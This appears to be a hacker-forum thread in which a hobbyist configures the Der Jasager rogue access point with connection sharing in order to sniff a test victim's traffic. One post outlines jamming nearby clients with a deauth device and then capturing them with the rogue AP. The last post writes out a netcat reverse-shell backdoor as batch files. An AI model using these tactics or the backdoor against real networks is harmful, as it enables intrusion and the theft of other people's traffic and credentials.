colforbin

I added my guide on ICS mit Der Jasger to the wiki. Just as Darren demonstrates in 4x07, once you set this up, there are a some neat things you can do. I ran Wireshark on the ICS'ed NIC and was able to capture all traffic coming from the "Mark". Be well

Okay. Here is the finished guide using the DHCP method. I tried adding this into the wiki, but I'm pretty lost there. The "Editing help" link leads to an entry that has one line of keystrokes. In any case, if anyone wants to add the guide into the wiki, that would be awesome. Be well _ics_mit_der_jasager.doc _ics_mit_der_jasager.pdf -Edit- Ne'ermind the request for help w/ the wiki. I got it straight. Thanks Darren and digininja.

Okay. I got it. In my best Jeffrey "The Dude" Lebowski voice, "My thinking about this case has become very uptight". Just go in to the Network tab in the webif interface (http://192.168.whateverYouSetThe.LastTwoOctetsAs/webif.html) Change "Connection Type" from whatever it's set to, to DHCP. You may have to do this a couple of times. From there: "Type" = Bridged "IP Address" = IPaddressYouWantDerJasagerToBe (in my case, that's 192.168.0.250) "Netmask" = 255.255.255.0 Save changes via the "Save Changes" button and the "Apply Changes" button Power down Der Jasager Power up Der Jasager Voila! I tested this 10 times. - Powered everything off - Powered the ICS'ed laptop on - Powered on Der Jasager and allowed the non-ICS'ed NIC on the laptop to associate to "OpenWrt" - Fired up Firefox and browsed to http://192.168.0.250 - Ensured that I was in "Blacklist" mode - Added "OpenWrt" to the SSID list - Enabled Karma - Powered on the "Mark" laptop and it associated to one of the APs in the "View Available Wireless Networks" window - Did ipconfig /all on the "Mark" laptop IP Address = 192.168.0.148 Subnet Mask = 255.255.255.0 Default Gateway = 192.168.0.1 DHCP Server = 192.168.0.1 DNS Servers = 192.168.0.1 - Fired up PuttyPortable and ensured that I was indeed on Der Jasager. Disregard most of the last write-up. I'll write another one and get it on the wiki. Thanks, and be well.

Okay. I've been at this for most of the day. I almost had my write-up on how to set up ICS and configure Der Jasager's IP configuration statically completed but I'm running into a serious snag. I'm linking to my write-up in .doc and .pdf format at the end of this post. Please understand that the guide Does Not Work Consistently. .doc .pdf - Edit 1029 14OCT09 - Docs have been typo corrected - End Edit - I've been shutting everything down and bringing everything back up to verify that this setup works. The only thing that I changed is the DNS servers in the webif interface page. I removed 192.168.0.1 and replaced it with the two that are delved out from my ISP. These changes have been saved and the Fonera has been powered off and on (several times afterwards too). The problem I'm having is that inconsistently, from the "Mark", I do ipconfig /all and sometimes I'll get 192.168.0.1 as my DHCP, Gateway and DNS Server, and sometimes I'll get 192.168.0.250 for my DHCP, Gateway and DNS Server. When I get 192.168.0.250, I can not access any web page in a browser. But, if I ping a web page's name from the command prompt (ping google.com) I get replies. Like I said. Sometimes the method I'm trying to set up in the uploaded document works. Sometimes it doesn't. In any case, the DHCP method still works, as in my earlier posts in this thread. If anyone has any ideas, hit me back. FYI - The only thing I tried configuring via SSH was to edit the /etc/dnsmasq.conf file with vi and added a line to the end that read dns server(s): dhcp-opton=6,IP_OF_FIRST_DNS,IP_OF_SECOND_DNS. When that had no affect, I SSH'ed back in and removed that line. Be well

Hold tight, good sir. I am in the middle of some hardcore testing. My goal is to be able to set this all up statically on Der Jasager, and "Atheros" (see my diagram). I should have something in before the end of today or possibly tomorrow. I'm sorry, but all I can offer is to ask for your patience. I will post back ASAP. Thanks mang.

See this thread. My replies to Mubix' post on his blog apply.

Darren Kitchen: I'll totally post to the wiki before the end of the day, once I ensure that I can set Der Jasager up with a static IP and point it to the ICS'ed laptop. That'll negate the need to waste time locating Der Jasager's IP, thusly making this a more portable/stealthy solution.

Sorry for posting so much, but if/when you do restore the original fonera firmware using this tutorial, The link in the first step "Access Redboot" is missing. This is the link. In the Access Redboot guide, set it all up via a a second router as per the directions. I had some bit of trouble trying to go straight from a PC to the fonera. Also, if for some reason IPs have been re-configured, just use Angry IP scanner or Nmap to locate the fonera's IP(s). Be well

I did this with a fonera that I got for free, from a fon promotion that I came across on digg a while back. Around the same time as I received the fonera, this tutorial came out on Mubix' site. I followed it and monkey'd around with it for a bit, but it never went anywhere. Fast-forward to the present. Once Der Jasager was released, I bought two foneras (both of which I received from fon, with the necessary firmware for Der Jasager). One for Der Jasager, and the other for the fon bomb. Yeah, I know, "Why waste a fonera on a jammer?" I was really just itching for an excuse to do something. I re-flashed the first fonera I received with the original firmware, using this guide. I'm keeping it around as a spare, just in case. I'd say if you have your eyes on a deal for a couple of foneras with DD-Wrt installed, then it's totally do-able. Good luck.

Okay. Sorry it took me so long to get back. Dinner turned into what? It turned into a housecall to backup/reformat/reinstall a jacked up, over a year-old XP installation/troubleshoot a power issue with a video card on the same machine. Fun times. In any case, I'm keeping everything configured as in the last diagram that I posted. Upon powering everything back up again, I lost the ICS configuration on the Atheros NIC. I'm assuming that's an XP feature (without extensive troubleshooting). Had to set it back up as in the diagram. Also the IP of OpenWRT was DHCP'ed to 192.168.0.112. Used Angry IP Scanner again to find OpenWrt's IP. Once I was in the Der Jasager's web setup, I ensured I was in Blacklist mode, added OpenWrt to the SSID list, and started Karma, as per digininja's directions. There was Zero foolishness with the Alfa card attempting to auto-connect to OpenWrt. Good times. Thank you digininja, sir! Powered up the Mark and associated to one of the APs listed in the "View Available Wireless Networks" window. Ran ipconfig and pinged 192.168.0.112 to ensure I was truly associated through Der Jasager. Fired up PuttyPortable and SSH'ed into 192.168.0.112 to verify. All is good. I am now accessing the Internet from the Mark>Der Jasager>XPS M1330>WRT54G>so on. From the time I got home to the time I had everything powered up, connected and verified - about a 15 minutes. I am going to bed now, as I've spent about 6 hours installing and customizing my buddy's XP machine (I'm so nice). My next step will be to replicate this current configuration, fire up Wireshark on the XPS laptop, and see what I can glean from the Mark while it checks mail, logs into sites, etc. I really wanna thank digininja for squaring me away. This is pretty damn cool IMHO. Be well.

Here's my final diagram. I'll get motivated to try the setup again, after dinner. Be well.

Try using Angry IP scanner or Nmap to scan for all IPs on the 192.168.0.0 and 192.168.1.0 networks. Using Angry IP scanner you would scan the ranges 192.168.0.0 - 192.168.0.254 and 192.168.1.0 - 192.168.1.254

digininja: During the course of working this out, I did have a wired connection between the laptop and the WRT54G. Trial and error. I'll definitely be working more on this later today, after I catch some shuteye. I wanna thank you again for reiterating/clarifying the White/Blacklist situation I'm having. It'll lock into my brain, once I do it a few times. I'm using Visio to create the diagrams. I tried to locate a WRT54G shape or something that would allow me to create shapes, but I didn't spend too much time on it. Iyeman: the LCARS setup on your web site is nawiiice. I like that very much.

http://fonerahacks.com/index.php/Tutorials...ss-Redboot.html The IP in the tutorial may or may not apply to your situation.

Got it! I shut everything down and started from scratch. After googling/reading a bit, I tried again. When you create an ICS connection, you'll be using two NICs. The one I'm using to connect to my WRT54G (and thusly the Internet) is "Alfa". When I set up Internet Connection Sharing, the IP address on the other NIC in my laptop (Atheros) was changed to a different subnet, without a a gateway (because it is a gateway now). Leave this setting alone. Once I had that all squared away, I fired up Der Jasager, associated to it with the Atheros NIC, opened up the webif interface and set the network configuration to DHCP. After this I used angry IP scanner to find Der Jasager's IP, so I could verify the settings. Voila! All is good. Now then, this was all done, without Karma enabled on Der Jasager. That's the next dilemma. It seems as if every time I fire up Karma, in any given order, both NICs on my laptop want to associate to it. That's outta my hands. Any thoughts? Be well.

That's an affirmative.

Iyeman: I tried to perform a tracert to google.com from the client connected to Der Jasager. It just sits there (for a lack of a better term). I can ping from the client>through Der Jasager>to the IP of the GN-WS50G NIC. That's as far as I can go. digininja: I think you're right. I set up DNS in the webif interface on the fon. It's got that same wonky issue mentioned in an another thread. Once I change and save the network settings (IP, gateway, add DNS servers) in webif, I have to switch between DHCP and Static IP in order to view the changes. When I do an ipconfig on the ICS'ed laptop, the settings for the GN-WS50G NIC are using the the fon's IP for its gateway and DNS servers. I'm connecting out in two directions. Neither side is "flowing"

digininja: thank you for the clarification. I reset the SSID list. set Der Jasager to Blacklist mode, added the WRT's SSID to the list, and powered down der Jasager. - Associated the Alfa NIC to the WRT54G - Powered on Der Jasager - Associated the GN-WS50G to OpenWRT (Der Jasager) - Associated Mark (The laptop I'm trying to get to access the Inet through Der Jasager>ICS'ed laptop>Inet connection) - No Inet connection. Still not able to pass traffic through an ICS'ed connection, or access the Internet while this configuration is in place. When I power down Der Jasager, I can then connec to the Internet

That's a no/go. I'm back to the "both WAPs associate to Der Jasager" issue. - Der Jasager is powered down - I set up the Alfa card with DHCP, associated to the WRT54G - I set up the GN-WS50G with DHCP and didn't let it associate to a WAP - Powered up Der Jasager - Once Der Jasager was powered up, I associated the GN-WS50G to it, and in the same instance, the Alfa card associated itself as well.

I have it set statically. I'll fire everything up again and see what happens.

@Iyeman: Thanks. Will try tomorrow and report back. - Edit - 0234: Each time I enable ICS, whether on one of my laptop's wireless NICs, or my wired connection, I can no longer access the Inet on the laptop. Also can not connect to the Inet via: Mark>Jasager>ICS'ed Laptop>Inet connection. I'm seriously going to bed lol.

Same results here. Jasager page is accessible without authentication. /webif.html asks for a username/password.

This is how I tried to set up my lab. Alfa NIC was set up with ICS. Result = Once I powered on Der Jasager, the Alfa card was connected to the fake WRT54G. Der Jasager is taking over the job of my physical WRT54G. I'll continue to experiment. Any help would be appreciated. - Edit - Ahzo! I think I have to add WRT54G to Der Jasager's whitelist. My network configuration looks jacked up too. I'll try again tomorrow evening. The sandman is calling.

For demonstration purposes only... Enter an environment where there is a lot of wireless network activity. On your person are two devices: - The Fon Bomb - Deauth all clients within range - Der Jasager (Listen to the pronunciation here) Launch the Fon Bomb for approximately 5 minutes. Then power off the Fon Bomb. Quickly power on Der Jasager and let the lil guy do his thing. Enjoy. -- Thank you Robin Wood, Darren, Mubix, and the whole technolust community --

There's a really simple backdoor in Volume 21, Issue 4 of 2600. It's called "Backdooring the NAT'ed Network", by David Dunn. The tutorial in the article has you create two batch files... - server.bat: @echo off cls nc.exe -v -v -L -p <port> - backdoor.bat: @echo off echo You have been owned. nc -d -e cmd -t <IP address or FQDN> <port> I just tried this with the copy of netcat for Windows linked to, earlier in this thread and it works fine. Hope this helped.